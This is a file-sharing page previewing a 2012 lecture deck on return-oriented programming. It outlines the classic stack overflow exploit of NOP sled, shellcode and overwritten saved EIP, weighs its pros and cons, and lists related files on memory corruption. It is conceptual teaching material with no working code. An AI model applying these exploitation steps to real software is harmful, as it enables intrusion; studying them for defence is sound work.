2012_rop(1).pdf
(
204 KB
)
Pobierz
Return-Oriented Programming
Scott Hand
CS 6v81.005 Spring 2012
Traditional Stack Overflow
NOP Sled
Payload
Saved EIP
Traditional Stack Overflow
•
The simplest stack overflow exploit is the one
that operates as follows:
1. Send a payload with a NOP sled, shellcode, and a
pointer to the NOP sled
2. The pointer to the NOP sled overwrites the
saved return address and thereby takes over the
stored EIP
3. EIP now points to the machine code and the
program executes arbitrary code
Evaluation
•
Pros
▫ Very easy to trigger
▫ Simple to understand
▫ Being able to inject code means our payloads are
powerful and flexible
•
Cons
▫ Just make the stack non-executable
▫ Lots of problems with bad characters, buffer sizes,
payload detection, etc.
Plik z chomika:
musli_com
Inne pliki z tego folderu:
2008_Return_Oriented_Programming(2).pdf
(4147 KB)
2009_debugging_buffer_overruns_freebsd_kernel(1).pdf
(338 KB)
2010_gdb(1).pdf
(1957 KB)
2010_memory_corruption_attacks(2).pdf
(3883 KB)
2010_ROP(1).pdf
(208 KB)
Inne foldery tego chomika:
CloudStack
distribution
dsp
electronics
LPI
Zgłoś jeśli
naruszono regulamin